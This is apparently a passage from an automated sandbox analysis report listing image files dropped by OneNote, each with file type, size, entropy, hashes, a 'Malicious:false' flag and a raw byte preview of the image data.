                                                                                                        SHA-512:8EE1A1F6F0023EB4F60760C2E23EAFD56E6D298CAB49D819CF1D62C0CCF608D4211D3767856255F7CF8FF45AD835FE5475EB92C608989C522CD48D00A050B189
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......Y.....?.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]ip...fu.VBBZ..V'.>........CR......?r...pU\....v*...T~.U)0..('`....."..,a..Y..$t!...D...Mkvf4.VhW;S........{...zZw...i......fj..$..7......[Z*.[.[..Zk...?.t:M..,..`.^...X,..sUK[..Rg.=$..!.3<....74...iY..i...k.,.fA..Z.n...`G.%..H.l7..7J...u.R..6....E..!....N@.....M....Q`...U2.w.WP[!fX......c ./@7Mz....^...k.)....v.Q`..z..1A..P.{...||...vY.....>.`...K...m.?CX./v.8.....]..;...6..kw......N....z.Q...f..q..xk.5....;.?.Z.c...`......4....?.....VV.u~..<_......sU4e.....g.c.G....O/..r...`.G)....#d5.O..w..{....twL1l.)#&hF..K...M[@.Dl..V2..j.3..s....3M.....v..!....V..c..B...|..e.1....7.WA0.[.\.u.).$7f.+.......8..e2K/.%.Ii..`w6w.E..[?_.?.?..I.k2.s....]..f....HM.?w..d.9..Rr....Y.c.}.s.zk..rc...a..I(9~........m...Z............I........7.K:.:Bf.......m..1.......&..,...?a...c.@.@.g%...s.#...;..c6...g.lZ....}.WX.3.8.....W....N.w...L...}....?.".......;cI.............pS
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:15:20], progressive, precision 8, 604x784, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):140755
                                                                                                        Entropy (8bit):7.9013245181576695
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3072:i/aDiblRsFcOco8dofE5Zx1+NQI8Wh9aiOe5NTO:mnbM+TxaAi98W3aiOwTO
                                                                                                        MD5:CC087700C07D674D69AFDFDA0FA9825C
                                                                                                        SHA1:F11113DF69DACDB255C6CBCFB29C1D1CCE40B346
                                                                                                        SHA-256:A7FA7F092EFF43030A56342C39A765F8D5CC48C7DB815DDFC8C1E5EC40117FAE
                                                                                                        SHA-512:843202D975EFA91E73287052A893584B6E5AE601F91612B56539AA2F73D1AD3F997FCAD1E711E0F483A2E91D46D9643D0B026B43F4E94116A5D2FB6551536034
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:15:20.............................\.......................................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................{.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?.......J...\O.,......../$..........OE.m.o......T....Z..l.g.-....m.?...Y....3......"....].j.X.k.S.k.....4..R....{....?F.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 813 x 99, 8-bit/color RGBA, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):99293
                                                                                                        Entropy (8bit):7.9690121496708555
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:1536:Moq1jVORV5NO5xLCBaaNk4vhpCr1CH/DATOQlWvHMHojiaAMrxArLFRZPj19AWFz:eVEbouBaIk4T8uDGOQlVHvaAMkhDh95V
                                                                                                        MD5:EA45266A770EEA27A24A5BB3BE688B14
                                                                                                        SHA1:9F0B23B3C8EBA4FC3C521E875EF876FBE018F3C8
                                                                                                        SHA-256:EDAD0F03E6FF99FEF9EF8E8B834CE74F26CD23C5F8C067F5CEE66F304181E64D
                                                                                                        SHA-512:D4EE36BDA897BBD643A699A0332DD00DE9CDCC6F46D861789BAD259A4BF87868AE3B4CFAAB6DFAF29941C7055B77A95D76BAA86A4A0DB2BF3BAF7E3317F03EB9
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR...-...c............sBIT....|.d.....pHYs...........~.....tEXtSoftware.Macromedia Fireworks 8.h.x....tEXtCreation Time.05/15/06.8.p....prVWx..[Oh\E...y3kv........`.%m.R..6.1.4).o..Ki...D.......P!.].=..K...C[....f.}o7VPJIg...{3.|....d.....i..=.4.u0...n y......@j..Q..f)..mQ...4-SJ..9.d.?..5\-....:b.W..i...c.5..{..pj#.....B1C/.I.......].Su.k?.2..:.9Q...5.U...UZ...e..U.c],..2.}...1..)W./..Epr.Zt.....K.=..{......e..."...v..B.4.#....A.V1.".V}t..[..2f..Y..V9.".6.......(..gbm.P.....Y%2.c.z.:Q.2.<tYF.....u.@..KJ.;u.q:.].....$.....V....Hqk..DW.l.e.j.Z.YP?:'R..*.<........6...m@..r..j2..HK"|..L.Nc..D..y.9..B4$.......`.3.m1LE....7(OU\+./.O...%6T..w......h....).I.&n...*......#..W.41...5.#.`..I...<.?.|..*+Q.....#i........$,..n...`.s....[..E. T.w..j.,&-.r..;a....#.>(.P......f...MU\3*..;B....)..5....z..(....-...a.....}y.l..E...z>......&..g.$.....*T...N....E:./.>..#...^..E.0..%......(..@..W.X.NDM.<~.]A.>..fW.O.y.'...Z...h..).F..
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):3879
                                                                                                        Entropy (8bit):7.9281351307465044
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:k1hccap27HGVhY2Kn+A3RS+HG3dXrjmg26vh:k1hccewIhYxRmR5
                                                                                                        MD5:C451B2A146BDD7EF33AB3EA27268796D
                                                                                                        SHA1:C040BA2F31342CBCBF597C96D4D6EDB83D473B77
                                                                                                        SHA-256:4C264B2A6E88712234DAA8E3A8D630CBF4EEB338554CB0B794D8031F8943EE65
                                                                                                        SHA-512:55915A304B261BC6F38F5CFE0389D5195F85FE2C1DA325019C3AA391E8B1773091E078A35BD57F8CEE0BA035956382AE33790EF462053FCE711EEA9665B7F917
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].p.U..g..Bp!...\.!.`pA.+....H.U..."Z..*U.. ..P.D.-.$..,,..$.g.......CB.l......I.g.pc..Lf..~.=.~]S.....w.9..w..'...!L..A ..^.t...v..s4&&&%%..6..`..:.G.D@.7.qS...K....[..,...o...p..2.%..B.Y....|;..gy+.[..,...o...p..2.%..B.Y....|;..gy+.[..,...og...}.W..z\?...y..;_t....=..e\.....6.M|[...B._....[_.\^Pf.....f.....\l..../6....<S.4./..m.......l....B'.n...O...yc...........X...P...k....t..9tf.g>....e..Sy'.L+**.]{..a...,7...p..+......K..y.9p...I{..i58....v..5.`Op.....{.......8.._.S.........p..).........;.....y...2...b.[>gP....C..G.H...........Osp...)..9x!...W.,..^....$r.p.sOJ.l..=.x.9s&:..........h.`..W"V..|.l{..72.....zv@.#.<.........../....F|...c...4.W....:uj@1...~.X............^si....Z..I~.Q.<.....NAOq...+i`.)...$L..gV.6#.....F$..hD.g.L-\..H._.u..]4......h...T.BK\\.Z222....7))..h...1??...~.-i=...X...~h....y[.............p.....x....c...{....Uh.7n.....
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):11332
                                                                                                        Entropy (8bit):7.9324721568775285
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:vpXZavBpl00n1Pt7JquG9GYHDK/5cxektxMQjcie9ZZkx30eXJIb8FKRN:vpZaDyc1P1Je9G62/5clpjre9nQkeXJY
                                                                                                        MD5:31579CA3352DF8FA4E3E7F48C7CDF672
                                                                                                        SHA1:AA682A3C781BF8EE43B5EDC9718E64CB79135F25
                                                                                                        SHA-256:B0E7824BEE2C896279457D87E61E902431BEB528D830524CC4DFAE126E89FC24
                                                                                                        SHA-512:782FF9492E3ECB11C72D316DDD94D1F3E94CD908FC9452A37DA6CA30ABCFE9AB2BCCED8583A569DA68626BCEC730408AF86997E295637BF64AFF5BC768F3E309
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..+.IDATx^.{...u./-...&....6..+z..Q."b*. &M.d-e.*.. ....J..Z-T.Z$....R..F...%*`bn..<.....W.E ..w....^...;g..[w.5w.9g...3......t8t.P.?$@.$@.5...=.8qb.... ...5...a=...#.y. ...@B.....am. .. .......$@.$`.....G.B.$@..S... ...C.zj.#[!.. ..).......!@=..........}..H.........VH..H.z.>@.$@.v.PO.pd+$@.$@=e. .. .;...v8... ...................f.o_o{....~t...n.S.N..?..._..L;J.H ..,....7.}...|....7...b...|.........ObVa1. .?.X.....~.....t2..V>.b.}..0.F....%`GO7.n#~..F....K.~...FX..H.^....k.Z/.2v.W..M.<.;$...v.t..,UO.-]............D.....o.J..Y........5.%.l....{.....'O..dC$....=uks..;{x.,.N.=.."..Q]..w>.E.H........AV=...f.&. ..ip}._0.~[pf.`..9..v.W.,..2.E.$P........+...OcC.H..=..|..[..g%(h.....W...?...UDh..T$..?....|.]..)?[Wo.h.'..2P.1..!.......$.NO.5..}...c.;...~.x,|Q....B..6.@>..y..}...m...D~z....L#.0`_.`.s?|....I.....a...=N....c.._.2.._..6 .]...5....{.^>.lM..;n...k..9J..S.G..{.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1604
                                                                                                        Entropy (8bit):7.814570704154439
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                        MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                        SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                        SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                        SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1604
                                                                                                        Entropy (8bit):7.814570704154439
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                        MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                        SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                        SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                        SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):109698
                                                                                                        Entropy (8bit):7.954100577911302
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3072:rDlmvIWr0aRtNCfShCWBxyCHMlcVG0Ezy4FR:rDliIfot8ahCWBcCHDVwR
                                                                                                        MD5:8D804A60E86627383BED6280ED62F1CF
                                                                                                        SHA1:E23FF14B10AD0762DD67FBA3CD6EFC85647C0384
                                                                                                        SHA-256:494547E566FB7A63DD429EB0699FE41AA8998F8EA2F758D813FE3D56C3075719
                                                                                                        SHA-512:0FB19F3D00159F2748C3A54E952E551B9FEA6910D67A54DECA8D099992E50383EADB92768FF1F75CFFAE82A7A157B1E0F77A2F0BE7EC64FD2324304FDCA46577
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d...............................................................................................!"#.123..AQB$..aq.RCS...b..c4%..rs..D&....5E6'..TdUte...u.....FV...7.......................!"..1A2B..QaqR.#.br3.........C%...$5.....c4U..Eeu&SsD.6T..................?.....O.C.....^..R<A.g...[....3.....r.0.....nX.S....}...[.?Z.....A.?..~~I..rY|N.o...9......!...o7r../-.y...'5.3.U.s".-.0.1......SS...&.Q.j.*.$m.e..:x....`}...EP.?.7..~G(so.......O.....z.N..<....~^a.e...........p9.?<._..|......~.<@.D.9..G..?.?z.y?z.C.U.w..[.,..A.+........s......g...G.^....pz.xY.....d8.y.X...P..O(A.O..~:._.......<...o..4s..^.^b..x......_a.....|{c...:..X.....}.._...[?..NK.c...}.<......H.G....+x.Z..|....n...o....`.nk.#.%x......-|...|7......N!=././..w.8x.".8....'x........w...,>....j[w8a..}..lS..?.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:19:29], progressive, precision 8, 221x792, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):24268
                                                                                                        Entropy (8bit):6.946124661664625
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:d2wiieoHTRh5a1HAteZCWOZIM+L7WhNjYn:8wHFHJ+/OZIKhNO
                                                                                                        MD5:3CD906D179F59DDFA112510C7E996351
                                                                                                        SHA1:48CDB3685606EDD79D5BCDF0D7267B8B1CCBD5A8
                                                                                                        SHA-256:1591FD26E7FFF5BE97431D0ED3D0ADE5CFC5FA74E3D7EC282FD242160CE68C1F
                                                                                                        SHA-512:2048CBA13AF532FF2BCC7B8B40541993234BD1A8AB6DE47B889AF3F3E4571F9C5A22996D0B1C16DD6603233F6066A1A2A97C16A6020BEDD0826B83BAD0075512
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:19:29.....................................................................................(.....................&...................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................$.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?.....)......[]t.\Z..g......A....&D.$LH._..X..Xl...`....cZ.X.........>......f.Z.X...]..~L.S..@..I$..I.IO.....x...s.g.[f.h{9..
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):13030
                                                                                                        Entropy (8bit):7.948664903731204
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:/06ULmwT2RqfILhmLy4tNpYGL0mvBQhTMHX4PCIVYm:s6USI2RqfGhmDrpYM0ofHX4aIVYm
                                                                                                        MD5:17E9FF9F735102231846936F0E2BAF1A
                                                                                                        SHA1:9EC1AE8A3AD55C48C02427D842D6E38DA85B5145
                                                                                                        SHA-256:DD1CA8DA90893E0B63ABFDD9E60CF2BF844B311964E9D9DDB855C21FCA156EBB
                                                                                                        SHA-512:71E690D6C87B09659296E6E6DDC8E3F91035DD80C5CE875FA557763E8138900C27FB492885291CEE203D65BCEE8C20C9C39E0590A5FD32B8A00BEB3E3F6D6E8F
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......h.....2......sRGB.........gAMA......a.....pHYs..........o.d..2{IDATx^.wp\.....sN$...$.).Q.")R2ei,kl.%....r..vm.x<...\...u.U.g.ry=..uX.cK.dI..I1G..$.".Fg.q...N.nt...3.w.w..~.v.O.....K.....A@.....A ..H.n.D;A@.....A@......e.y ..... ...1..P..xH.. ..... ..e.9 ..... ...1..P..xH.. ..... ..e.9 ..... ...1.@.$9..S....A@..4....^C..F..VR\\TT.........aHII1......VS..g........... .*....z..|Ek.......<R../55+33;;;+..Y..WC..#...P..... ...s#0::......522...,.v..D......_.....9.2N.L.'..F$.....e..!..... ...N...`1....G.....'&,f..f.X....!.lp......I_........J..z.R,YbYd&.... ......~"b\...b.Z.SS.....c....&..Yl-............... ..[...BY......... ... 1..Z..6NN............._.zw....MKK.Z..vMMnnn.4.v....,q..e... .D%....Q......._..p*M......22..e...k.}.....qU....S.a...~....P..}v.. ...1..2...F.GCC#...].=..C..n#...K+..MOO..........."....d^2=.{....U.p.h%.%n...D.....XB..b..'''....?h.b.B\v..^Q^.UC............Q...I.....U.VD...P..{.2"A@...b..V...........jF.x.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 230 x 68, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):4181
                                                                                                        Entropy (8bit):7.950380155401321
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:L6ousL3eslFAmjb89xK6YiSTwtw5dTA1W9lQ:GoFiUFAMbsxJYieZ5dGklQ
                                                                                                        MD5:BC6C08F8C2C6D1EEE95ABFC40C3C3669
                                                                                                        SHA1:44DE7375375880ACC24938D7E92A837E85C35321
                                                                                                        SHA-256:6E54B502C46E1AFA57E28B8ACCCE24F102399F31407827A91E4CD7A42FCBC746
                                                                                                        SHA-512:2AF4A9B87FA4F362926CD77F272CECBE3ED4F0E110FB8F30F661DF7C61B77B9FD8E7716EEF9177B1038B68C792CA4F844F729DAA48B2E38B9945EC9CB44BB720
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......D.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.yp.....E-.......-v...VY.a.d....R.euF.).KH@.*B..u@YdQ....!&.tjg.!.,a'.L..@H...{'\~yy.....w2z...s.=..;..s.......]..j..b5d.j.X...2D......r.\.#..f...Bl.....5dC....r...............:m.....s..j.f..jK....y.^....'8.....<......g.....=.%..2.p..}<.....G.....Ix.m.4dm..B.......0?..+_.*..c..n.......?....wa..l...p....E.Ly.}...*...C.D.vy).....@.>\...3;.`].q..m../.d.B.../......~.p.U..'...sP\....YH.7.../....R!...O...'.....s....<|.f)....i.{.I..l.a.n...?~.{...h...s.e..-..Q..R..@<;.y.G.+n.....Y.Y'.V.}.o._..?...,.>}..\w....`+.}.{.p"d.RO=&.v..H].....k...X.c..z.{........}.n....s:c...i7N...|....*\..O.*....)w..[>..E..}y....q..u.!.z.D.[`Uf.Y...>z\..x.B.h" \.}...`...|._.....G...hY.../..6>..Z...8^..k.E.5d#..a."....P.CR....OL..U...qY.{.C.<~I=V..x.J..*k.Y....z.;?..^...3.4|i...[DL,..z].._..a.....(s./...W~..q*.\#@[R.N...@.."..=....\q...<.......p...+J..\#...(.,....OQ...$L...G...
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 221 x 77, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):2599
                                                                                                        Entropy (8bit):7.903700862190034
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:PmCwDJh8w9JewaF2zQNXXj8zq1KM43sxXxjYbTgJW1MFsrJ075CawGjGj:P1Ah8UewaFcgz82Kx8xXNYb3id/yj
                                                                                                        MD5:E88131C9AAC52649FF044905ACAB9B76
                                                                                                        SHA1:34AE73B9165CBED0DDF33AC20E4B3E7D622C19BF
                                                                                                        SHA-256:30F22340F582F9A352A7ED3048D1088F178E83CCAACAC1CCFD86852C8F9C78E3
                                                                                                        SHA-512:97AFE8F3A2A3138613934AC737C390A35F6757BFC3D381EA7C7CD148F739932380DCD46D0BA6F590C274F8BFB4D4286B3C0433AA69E090102A8A9ABDD7C97EB1
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......M.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]kl.U....B|E..>...*..Q........b[.K........m.(..... ...!%1%*-B.C~(&`[.....-.....~.w3..Kw.3wvfzn.2{..s.....{w..\....!.3..:..!..../..zD.x...O.K... ^.1*...8.G...z...D.$...........>!..V..`v.CQQQ!..-L...../3.2......ZH.?s...Iu\N..,3.?.p..N......<....E.<.=z..Iu<ll.dX...g....+.{X.p.....:..t...a...cKK.|...Yszl.N.:......KPs.):).T.5...&B...*..5j``@...(_r.V.j..m...?x.sg...t\.dz.'^.=.\.h..<.y....:.I...w..ze.m.\.qPJu.....D.|..@......W..t.+.....X....e....\H+.Ns%^r.VS.N.3:...&...._..#^....d! ..F.....xc..M...q...17.z...z&C...K9(.Ifm.35.v.>.'X,...p.:=.H...J.K.,...:~...7.t.....R..R..9..?....l../.(...0z0.M.f.)H..Y_"e......B........L...q.K......|;..L.........xI.K3.M..%........./..){....R....s...7....).q.._R.4O.a3......<..%....3#.|>..y...u...R'.P..$Klz...........,...g.....`.7..\...x>.{p\;>+.,.....e.-..Re@.N..FY_....*....]}...[..h.M.oq.S.U...c_}`......8TP....
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 69x630, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):11040
                                                                                                        Entropy (8bit):7.929583162638891
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:u99+91V42ho91V42ho91V42ho91V4235z9pUkDCyixxo4PS6b8tEy3BcWWhhSy0b:ubKD4/D4/D4/D4uzX38u4PNYJ2zhhmb
                                                                                                        MD5:02775A1E41CF53AC771D820003903913
                                                                                                        SHA1:2951A94A05ECF65E86D44C3C663B9B44BAD2BC9D
                                                                                                        SHA-256:83245F217DEAE4A4143B565E13C045DBB32A9063E8C6B2E43BB15CD76C5F9219
                                                                                                        SHA-512:5A1FCC24BDD5EE16BC2C9BACF45BCECF35ED895EAC22D2C4EE99C1B7E79C8E8B9E5186E3D026BA08FF70E08113F0A88FBF5E61C57AF4F3EA9BA80CE9F33410E9
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.....H.H.....C....................................................................C.......................................................................v.E.............................................S..........................Aa..!12Qqw.....3568rv........".....4Btu.....#Rs.(W..bg.................................D.....................1..2.!4Aqrs....Qa......t..."3BRb....#.$S.Cc..............?...K/h._+.N6.-.a...5...;.r....,...0B.s(..zp..4.%r|q..E.Q^.../...C.R..?u.q8XN.>.e..:..gJ...._.n>.70G,..(........3b.&.5m...Q../...7Ie..k....e.l6..&..`Gt.P.Y^r...=..Y.e...N.B...O.#..J+........u.V;G.'.....V.]8..C.]..........E.....c..w&lX..f..\T.J?...F.,..m|..93........,.....+.R..WG...%.....(@.....p].iEz<.8.^...J.h.....a8P.1......(z..y~.........H.Z^.>..<.....L.k..IG...R.(.%..m....&u...B|.....@]ey.W.J...!d..R.8...[..>8....(.G......!.)X.....,'..F2.Z.t..Aw./..Z..#..i.kK.......b.i...qR.(....RE.............O.XP.#..(...9J..]...,.2.[w....KrW'...tY.......{~.:.+..
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):13084
                                                                                                        Entropy (8bit):7.940058639272698
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:o4KSpFN6Ud4c3p2Il1yavNr5spYVJzimlfZ:wGN6Udv4IKavLBJz/r
                                                                                                        MD5:0693DABBBC411538D209F32E22F622F6
                                                                                                        SHA1:FB7E675406FA123CDB7E058D336742D6A2E8DC8E
                                                                                                        SHA-256:2DFB2E7A1A3AA43C673D2EE540D3C366CEB12105EB5441F98992FC06F4284013
                                                                                                        SHA-512:F07732660EC62DAE58EB02E2E9476007EA92BF826F642BCA547097136AEA01D29FF69D9B0CD0F5D65A5E15AA66CA4AA4804AA171A3504AAB198631C643C90C16
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......~.............sRGB.........gAMA......a.....pHYs..........o.d..2.IDATx^.w....'m.9c.6"...&.`.N.(.TN.Ne.N.R.eKr..T.*[...?T..:I.D.S>I$A...I......y.9...f......3...Gh.....}_.o....n..A@.....A@...L...2... ..... .x...#. ..... .....1f]9.[.....A@......3 ..... ...fE@x.YWN.....A@......1...... .....Y..J.Y.N.....s"................./..rc.scuyyyu...\s....t.oi..j..lv.....Gr.#9%%%9%--....d.T...r...DH...6.....%U..A@.0.....rAD ........2.5.......L.R..=W...gZ.`o..-?.T.Cy.:...y.9..y.EE...v......1..R.....1.".... `"...ss.......i.!.hY...Fj*....%.-.Gw...HJJr8..6...#.......!(.?P.(.....8(u........*..OOO..........dgg....Q..=..c.y....A`S.@.......3.CC..GFfg. .I.I.COrJFFFNNV^nn^^.z..%..(...^.b$........a..y.LMO-.,ylV+.k...T>Jg..*//-+-......M=..x.....E.... `~..N.Kww.......z...%%.e.%.yy.i...P.)'.,A.5.d.0.Cc35==66>2::33..>..;..Ii.i.gv...DSd....l#...l..............................)**,**...V..1 .F.'7....)..SSs..7..F...C.p....(*,......(RG..B...l!.2. ....|r1
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):13030
                                                                                                        Entropy (8bit):7.948664903731204
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:/06ULmwT2RqfILhmLy4tNpYGL0mvBQhTMHX4PCIVYm:s6USI2RqfGhmDrpYM0ofHX4aIVYm
                                                                                                        MD5:17E9FF9F735102231846936F0E2BAF1A
                                                                                                        SHA1:9EC1AE8A3AD55C48C02427D842D6E38DA85B5145
                                                                                                        SHA-256:DD1CA8DA90893E0B63ABFDD9E60CF2BF844B311964E9D9DDB855C21FCA156EBB
